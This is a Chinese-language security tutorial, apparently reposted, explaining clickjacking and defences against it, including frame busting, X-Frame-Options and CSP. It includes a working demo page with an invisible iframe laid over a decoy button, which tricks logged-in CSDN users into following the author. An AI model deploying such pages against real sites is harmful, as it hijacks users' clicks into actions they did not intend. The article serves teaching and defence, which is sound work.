网络安全-点击劫持(ClickJacking)的原理、攻击及防御
目錄
簡介
原理
攻擊
防御
frame busting
X-Frame-Options
Content Security Policy
NoScript擴展
拓展
參考
簡介
2008年,安全專家Robert Hansen 與Jeremiah Grossman發現了一種被他們稱為點擊劫持(ClickJacking)的攻擊。他們準備在OWASP安全大會上公布并進行演示,但是由于很多平臺都中了招,包括Adobe在內的廠商要求在漏洞修補前不要公開此問題。
原理
點擊劫持是視覺欺騙,用戶只看到了底層頁面,與頁面進行交互時卻是與上層頁面在交互。這是由于透明的iframe造成的,通過控制iframe的位置,導致上層頁面的按鈕等覆蓋到下層上。
點擊劫持,原理示意圖注:紅色按鈕(上層頁面中的)應該是完全覆蓋在黃色按鈕(底層頁面中的),由于看的不是很清楚,我稍微錯位了一下。
攻擊
<html> <head> <title> 來和鹿鳴Lumi互動吧!!! </title> <head> <style> iframe {width: 1440px;height: 900px;position: absolute;top: 30px;left: 450px;z-index: 2;-moz-opacity: 0;opacity: 0;filter: alpha(opacity=0); } </style> </head> </head> <body> <center> <div> <img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=1242777858,3501957407&fm=11&gp=0.jpg" height="60%"> <br> <button>點擊進行互動</button> </div> </center> <iframe src="https://blog.csdn.net/lady_killer9" scrolling="no"></iframe></body> </html>opacity為0.5,即上層頁面為半透明狀態。
opacity為0.5時可以看到關注按鈕覆蓋在了下方的點擊進行互動按鈕上。
opacity為0時?此時,上層頁面完全無法看見,這時如果你登錄csdn后點擊"點擊進行互動"按鈕,就會關注我。
防御
frame busting
js編寫的,防御效果不好,可繞過。
X-Frame-Options
部分瀏覽器支持
DENY:禁止iframe,瀏覽器拒絕當前頁面加載任何iframe頁面。
SAMEORIGIN:只允許相同域名下的網頁iframe,同源政策保護。
ALLOW-FROM: 白名單限制。
Content Security Policy
"網頁安全政策"(Content Security Policy,縮寫 CSP),一種白名單制度。
NoScript擴展
火狐官方回答拓展
除了這種點擊劫持,還有拖拽劫持,手機端觸屏劫持,原理都一樣。
參考
《白帽子講Web安全》
更多內容查看:網絡安全-自學筆記
喜歡本文的請動動小手點個贊,收藏一下,有問題請下方評論,轉載請注明出處,并附有原文鏈接,謝謝!如有侵權,請及時聯系。如果您感覺有所收獲,自愿打賞,可選擇支付寶18833895206(小于),您的支持是我不斷更新的動力。
總結
以上是生活随笔為你收集整理的网络安全-点击劫持(ClickJacking)的原理、攻击及防御的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: extjs3.0与extjs4.0区别
- 下一篇: 阳历时间转换为农历时间